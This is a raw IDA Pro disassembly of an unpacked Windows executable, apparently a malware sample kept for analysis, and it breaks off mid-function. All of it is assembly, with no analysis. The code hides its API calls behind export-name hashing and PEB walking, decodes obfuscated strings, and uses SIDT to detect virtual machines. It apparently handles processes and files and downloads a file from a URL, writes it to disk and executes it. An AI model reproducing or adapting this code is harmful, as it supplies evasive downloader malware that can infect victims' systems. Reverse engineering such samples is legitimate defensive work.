;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8ADC689FAC52EE95E7DAB9D865B7D9B0
; File Name : u:\work\8adc689fac52ee95e7dab9d865b7d9b0_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102C+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea ecx, [edx-1]
test ecx, ecx
push 2
pop eax
jz short loc_401014
loc_40100E: ; CODE XREF: sub_401000+12�j
imul eax, eax
dec ecx
jnz short loc_40100E
loc_401014: ; CODE XREF: sub_401000+C�j
push esi
movzx esi, [esp+4+arg_0]
push 8
dec eax
and eax, esi
pop ecx
sub ecx, edx
shl eax, cl
mov cl, dl
shr esi, cl
or eax, esi
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102C proc near ; CODE XREF: sub_401117:loc_40115E�p
; sub_4014A6+231�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_40104E: ; CODE XREF: sub_40102C+3C�j
movzx eax, byte ptr [ebx]
push 5
push eax
call sub_401000
not al
xor al, 56h
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_40104E
pop ebx
loc_40106B: ; CODE XREF: sub_40102C+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102C endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011C2�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401C34+1CA�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102C+F�p
; sub_4014A6+EA�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_40249D+17C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_40249D+C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+53�p
; sub_40130A+53�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 8Ch
jge short loc_40112D
inc dword_404104
loc_40112D: ; CODE XREF: sub_401117+E�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011C2
dec eax
jz short loc_4011B3
dec eax
jz short loc_4011A4
dec eax
jz short loc_401195
dec eax
jz short loc_401186
dec eax
jz short loc_401177
dec eax
jz short loc_401151
xor eax, eax
jmp loc_401307
; ---------------------------------------------------------------------------
loc_401151: ; CODE XREF: sub_401117+31�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_40115E: ; CODE XREF: sub_401117+6D�j
; sub_401117+7C�j ...
call sub_40102C
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011C7
; ---------------------------------------------------------------------------
loc_401177: ; CODE XREF: sub_401117+2E�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_40115E
; ---------------------------------------------------------------------------
loc_401186: ; CODE XREF: sub_401117+2B�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_40115E
; ---------------------------------------------------------------------------
loc_401195: ; CODE XREF: sub_401117+28�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_40115E
; ---------------------------------------------------------------------------
loc_4011A4: ; CODE XREF: sub_401117+25�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_40115E
; ---------------------------------------------------------------------------
loc_4011B3: ; CODE XREF: sub_401117+22�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40301C
jmp short loc_40115E
; ---------------------------------------------------------------------------
loc_4011C2: ; CODE XREF: sub_401117+1B�j
call sub_401072
loc_4011C7: ; CODE XREF: sub_401117+5E�j
push 52h
pop ecx
push 0FFFFFFEDh
mov [ebp+arg_0], eax
pop eax
loc_4011D0: ; CODE XREF: sub_401117+CE�j
cmp eax, 8Bh
ja short loc_4011D9
inc ecx
inc eax
loc_4011D9: ; CODE XREF: sub_401117+BE�j
add ecx, 0Eh
add eax, 0Eh
cmp ecx, 94h
jl short loc_4011D0
push ebx
mov ebx, [ebp+arg_0]
mov dword_404104, ecx
mov eax, [ebx+3Ch]
mov edx, [eax+ebx+78h]
add edx, ebx
cmp ecx, 8
jl short loc_401206
inc ecx
mov dword_404104, ecx
loc_401206: ; CODE XREF: sub_401117+E6�j
cmp ecx, 0DFh
jle short loc_401217
push 27h
pop ecx
mov dword_404104, ecx
loc_401217: ; CODE XREF: sub_401117+F5�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_40122E
movzx esi, word ptr [ebp+arg_4]
sub esi, [edx+10h]
jmp loc_4012DD
; ---------------------------------------------------------------------------
loc_40122E: ; CODE XREF: sub_401117+109�j
push 8
pop ecx
push 0FFFFFFECh
pop eax
loc_401234: ; CODE XREF: sub_401117+132�j
cmp eax, 0C2h
ja short loc_40123D
inc ecx
inc eax
loc_40123D: ; CODE XREF: sub_401117+122�j
add ecx, 26h
add eax, 26h
cmp ecx, 0A0h
jl short loc_401234
push edi
mov dword_404104, ecx
mov esi, [edx+20h]
mov edi, [edx+24h]
lea eax, [ecx-60h]
add esi, ebx
add edi, ebx
cmp eax, 89h
ja short loc_40126D
inc ecx
mov dword_404104, ecx
loc_40126D: ; CODE XREF: sub_401117+14D�j
and [ebp+var_4], 0
cmp dword ptr [edx+18h], 0
jbe short loc_4012A4
loc_401277: ; CODE XREF: sub_401117+18B�j
mov ecx, [esi]
xor eax, eax
add ecx, [ebp+arg_0]
jmp short loc_401289
; ---------------------------------------------------------------------------
loc_401280: ; CODE XREF: sub_401117+176�j
movsx ebx, bl
rol eax, 7
xor eax, ebx
inc ecx
loc_401289: ; CODE XREF: sub_401117+167�j
mov bl, [ecx]
test bl, bl
jnz short loc_401280
cmp eax, [ebp+arg_4]
jz short loc_4012D5
inc [ebp+var_4]
mov eax, [ebp+var_4]
add esi, 4
inc edi
inc edi
cmp eax, [edx+18h]
jb short loc_401277
loc_4012A4: ; CODE XREF: sub_401117+15E�j
mov esi, [ebp+arg_0]
loc_4012A7: ; CODE XREF: sub_401117+1C1�j
push 3
pop ecx
push 0FFFFFFA3h
pop eax
pop edi
loc_4012AE: ; CODE XREF: sub_401117+1AA�j
cmp eax, 68h
ja short loc_4012B5
inc ecx
inc eax
loc_4012B5: ; CODE XREF: sub_401117+19A�j
add ecx, 0Eh
add eax, 0Eh
cmp ecx, 8Bh
jl short loc_4012AE
mov eax, [ebp+var_4]
mov dword_404104, ecx
cmp eax, [edx+18h]
jnz short loc_4012DA
xor eax, eax
jmp short loc_401306
; ---------------------------------------------------------------------------
loc_4012D5: ; CODE XREF: sub_401117+17B�j
movzx esi, word ptr [edi]
jmp short loc_4012A7
; ---------------------------------------------------------------------------
loc_4012DA: ; CODE XREF: sub_401117+1B8�j
mov ebx, [ebp+arg_0]
loc_4012DD: ; CODE XREF: sub_401117+112�j
cmp ecx, 2
mov eax, [edx+1Ch]
lea eax, [eax+esi*4]
mov eax, [eax+ebx]
jl short loc_4012F2
inc ecx
mov dword_404104, ecx
loc_4012F2: ; CODE XREF: sub_401117+1D2�j
cmp ecx, 0F6h
jle short loc_401304
mov dword_404104, 17h
loc_401304: ; CODE XREF: sub_401117+1E1�j
add eax, ebx
loc_401306: ; CODE XREF: sub_401117+1BC�j
pop ebx
loc_401307: ; CODE XREF: sub_401117+35�j
pop esi
leave
retn
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40130A proc near ; CODE XREF: sub_401C34+1D7�p
; sub_4029BA+12�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
push 2Fh
pop eax
push 25h
pop ecx
loc_401319: ; CODE XREF: sub_40130A+24�j
cmp ecx, 0ECh
ja short loc_401323
inc eax
inc ecx
loc_401323: ; CODE XREF: sub_40130A+15�j
add eax, 26h
add ecx, 26h
cmp eax, 0A6h
jl short loc_401319
cmp byte_404209, 0
mov dword_404104, eax
jz short loc_401345
mov al, byte_404208
leave
retn
; ---------------------------------------------------------------------------
loc_401345: ; CODE XREF: sub_40130A+32�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_404104, 12h
mov byte_404208, al
jl short loc_40138B
inc dword_404104
loc_40138B: ; CODE XREF: sub_40130A+79�j
cmp dword_404104, 0D8h
jle short locret_4013A1
mov dword_404104, 18h
locret_4013A1: ; CODE XREF: sub_40130A+8B�j
leave
retn
sub_40130A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013A3 proc near ; CODE XREF: sub_4014A6+28F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_404104
add eax, 0FFFFFFE0h
cmp eax, 0C3h
ja short loc_4013BC
inc dword_404104
loc_4013BC: ; CODE XREF: sub_4013A3+11�j
push ebx
push esi
xor esi, esi
inc esi
cmp [ebp+arg_0], 0
push edi
jz loc_40147F
mov edi, 99A4299Dh
push edi
push esi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push esi
push esi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_401426
mov eax, dword_404104
add eax, 0FFFFFFDAh
cmp eax, 0B0h
ja short loc_4013FC
inc dword_404104
loc_4013FC: ; CODE XREF: sub_4013A3+51�j
push 0FDC94385h
push esi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov edi, [ebp+var_4]
push 9E6FA842h
push esi
call sub_401117
pop ecx
pop ecx
push edi
push ebx
call eax
jmp short loc_401482
; ---------------------------------------------------------------------------
loc_401426: ; CODE XREF: sub_4013A3+42�j
push 55h
pop eax
push 31h
pop ecx
loc_40142C: ; CODE XREF: sub_4013A3+9E�j
cmp ecx, 0A4h
ja short loc_401436
inc eax
inc ecx
loc_401436: ; CODE XREF: sub_4013A3+8F�j
add eax, 2Ch
add ecx, 2Ch
cmp eax, 83h
jl short loc_40142C
push edi
push esi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push esi
call eax
push 9E6FA842h
push esi
mov ebx, eax
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push esi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401482
; ---------------------------------------------------------------------------
loc_40147F: ; CODE XREF: sub_4013A3+23�j
mov ebx, [ebp+arg_0]
loc_401482: ; CODE XREF: sub_4013A3+81�j
; sub_4013A3+DA�j
cmp dword_404104, 74h
jge short loc_401491
inc dword_404104
loc_401491: ; CODE XREF: sub_4013A3+E6�j
push 723EB0D5h
push esi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_4013A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014A6 proc near ; CODE XREF: sub_401C34+1E1�p
; sub_4029BA+E8�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402D20
push 2Eh
pop eax
or ecx, 0FFFFFFFFh
loc_4014B9: ; CODE XREF: sub_4014A6+28�j
cmp ecx, 98h
ja short loc_4014C3
inc eax
inc ecx
loc_4014C3: ; CODE XREF: sub_4014A6+19�j
add eax, 22h
add ecx, 22h
cmp eax, 0BAh
jl short loc_4014B9
push ebx
push esi
push edi
push 774393E8h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
mov ebx, 100h
push ebx
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_4017B0
cmp dword_404104, 66h
jge short loc_40152E
inc dword_404104
loc_40152E: ; CODE XREF: sub_4014A6+80�j
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_4017B0
mov edi, offset dword_404108
loc_401544: ; CODE XREF: sub_4014A6+304�j
mov eax, [ebp+var_4]
mov esi, [ebp+eax*4+var_1318]
test esi, esi
jz loc_40179E
mov eax, dword_404104
add eax, 0FFFFFFD6h
cmp eax, 0CCh
ja short loc_40156B
inc dword_404104
loc_40156B: ; CODE XREF: sub_4014A6+BD�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_40178B
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_40178B
cmp dword_404104, 0Eh
jl short loc_4015D5
inc dword_404104
loc_4015D5: ; CODE XREF: sub_4014A6+127�j
cmp dword_404104, 0EDh
jle short loc_4015EB
mov dword_404104, 18h
loc_4015EB: ; CODE XREF: sub_4014A6+139�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_40178B
cmp [ebp+var_117], 3Ah
jnz loc_40178B
cmp [ebp+var_116], 5Ch
jnz loc_40178B
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_401649
; ---------------------------------------------------------------------------
loc_401648: ; CODE XREF: sub_4014A6+1AB�j
dec esi
loc_401649: ; CODE XREF: sub_4014A6+1A0�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_401648
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_4016AA
push 49h
pop eax
push 0FFFFFFF7h
pop ecx
loc_401666: ; CODE XREF: sub_4014A6+1D5�j
cmp ecx, 86h
ja short loc_401670
inc eax
inc ecx
loc_401670: ; CODE XREF: sub_4014A6+1C6�j
add eax, 23h
add ecx, 23h
cmp eax, 9Ch
jl short loc_401666
push [ebp+arg_0]
mov dword_404104, eax
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_40178B
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_4017D5
; ---------------------------------------------------------------------------
loc_4016AA: ; CODE XREF: sub_4014A6+1B8�j
cmp dword_404104, 8
jl short loc_4016B9
inc dword_404104
loc_4016B9: ; CODE XREF: sub_4014A6+20B�j
cmp dword_404104, 0D9h
jle short loc_4016CF
mov dword_404104, 17h
loc_4016CF: ; CODE XREF: sub_4014A6+21D�j
push 0Bh
push edi
push offset dword_40306C
call sub_40102C
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_40178B
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_40178B
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_40178B
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1318]
call sub_4013A3
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_40102C
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_40178B: ; CODE XREF: sub_4014A6+F5�j
; sub_4014A6+11A�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40179E: ; CODE XREF: sub_4014A6+AA�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_401544
loc_4017B0: ; CODE XREF: sub_4014A6+73�j
; sub_4014A6+93�j
cmp dword_404104, 9
jl short loc_4017BF
inc dword_404104
loc_4017BF: ; CODE XREF: sub_4014A6+311�j
cmp dword_404104, 0E2h
jle short loc_4017D5
mov dword_404104, 26h
loc_4017D5: ; CODE XREF: sub_4014A6+1FF�j
; sub_4014A6+323�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017DA proc near ; CODE XREF: sub_401C34+27B�p
; sub_401C34+2EF�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
xor ebx, ebx
cmp dword_404104, 12h
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
jge short loc_401802
inc dword_404104
loc_401802: ; CODE XREF: sub_4017DA+20�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset dword_403078
call sub_40102C
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
cmp dword_404104, 1
mov [ebp+var_1C], ebx
jl short loc_40186C
inc dword_404104
loc_40186C: ; CODE XREF: sub_4017DA+8A�j
cmp dword_404104, 0C1h
jle short loc_401882
mov dword_404104, 21h
loc_401882: ; CODE XREF: sub_4017DA+9C�j
push 4
pop edi
loc_401885: ; CODE XREF: sub_4017DA+3DF�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
cmp dword_404104, 0Fh
mov [ebp+var_8], eax
jl short loc_4018CD
inc dword_404104
loc_4018CD: ; CODE XREF: sub_4017DA+EB�j
cmp dword_404104, 0DBh
jle short loc_4018E3
mov dword_404104, 15h
loc_4018E3: ; CODE XREF: sub_4017DA+FD�j
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
cmp dword_404104, edi
jl short loc_40193C
inc dword_404104
loc_40193C: ; CODE XREF: sub_4017DA+15A�j
cmp dword_404104, 0D5h
jle short loc_401952
mov dword_404104, 27h
loc_401952: ; CODE XREF: sub_4017DA+16C�j
push 2F5CE027h
push edi
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401AB0
push 18h
pop eax
push 0FFFFFFC7h
pop ecx
loc_401993: ; CODE XREF: sub_4017DA+1CB�j
cmp ecx, 7Fh
ja short loc_40199A
inc eax
inc ecx
loc_40199A: ; CODE XREF: sub_4017DA+1BC�j
add eax, 27h
add ecx, 27h
cmp eax, 0B2h
jl short loc_401993
push 8F8F114h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp dword_404104, 0F8h
jge short loc_401A81
inc dword_404104
jmp short loc_401A81
; ---------------------------------------------------------------------------
loc_401A1D: ; CODE XREF: sub_4017DA+2AA�j
cmp al, bl
jz short loc_401A86
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
loc_401A81: ; CODE XREF: sub_4017DA+239�j
; sub_4017DA+241�j
cmp [ebp+var_4], ebx
ja short loc_401A1D
loc_401A86: ; CODE XREF: sub_4017DA+245�j
mov eax, dword_404104
add eax, 0FFFFFFE4h
cmp eax, 0DBh
ja short loc_401A9B
inc dword_404104
loc_401A9B: ; CODE XREF: sub_4017DA+2B9�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401AC3
; ---------------------------------------------------------------------------
loc_401AB0: ; CODE XREF: sub_4017DA+1AD�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401AC3
mov [ebp+arg_8], bl
jmp short loc_401AC3
; ---------------------------------------------------------------------------
loc_401ABF: ; CODE XREF: sub_4017DA+30F�j
cmp al, bl
jz short loc_401AEB
loc_401AC3: ; CODE XREF: sub_4017DA+2D4�j
; sub_4017DA+2DE�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401ABF
loc_401AEB: ; CODE XREF: sub_4017DA+2E7�j
cmp dword_404104, 0DAh
jge short loc_401AFD
inc dword_404104
loc_401AFD: ; CODE XREF: sub_4017DA+31B�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
cmp dword_404104, 0A9h
jge short loc_401B33
inc dword_404104
loc_401B33: ; CODE XREF: sub_4017DA+351�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
inc [ebp+var_1C]
push 35h
pop eax
push 0FFFFFFEEh
pop ecx
loc_401B8C: ; CODE XREF: sub_4017DA+3C7�j
cmp ecx, 0AFh
ja short loc_401B96
inc eax
inc ecx
loc_401B96: ; CODE XREF: sub_4017DA+3B8�j
add eax, 14h
add ecx, 14h
cmp eax, 0B2h
jl short loc_401B8C
mov ecx, [ebp+var_14]
cmp ecx, [ebp+var_24]
mov dword_404104, eax
jz short loc_401BBF
cmp [ebp+var_1C], 5
jge short loc_401BBF
cmp [ebp+arg_8], bl
jnz loc_401885
loc_401BBF: ; CODE XREF: sub_4017DA+3D4�j
; sub_4017DA+3DA�j
lea edx, [eax-23h]
cmp edx, 0B1h
pop edi
pop esi
ja short loc_401BD2
inc eax
mov dword_404104, eax
loc_401BD2: ; CODE XREF: sub_4017DA+3F0�j
lea eax, [ecx-2]
cmp eax, 3FEh
ja short loc_401BE0
xor eax, eax
jmp short loc_401C31
; ---------------------------------------------------------------------------
loc_401BE0: ; CODE XREF: sub_4017DA+400�j
cmp [ebp+arg_8], bl
jz short loc_401C2E
add ecx, 0FFFFFBFFh
cmp ecx, 48FDEh
ja short loc_401C2E
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
jmp short loc_401C31
; ---------------------------------------------------------------------------
loc_401C2E: ; CODE XREF: sub_4017DA+409�j
; sub_4017DA+417�j
or eax, 0FFFFFFFFh
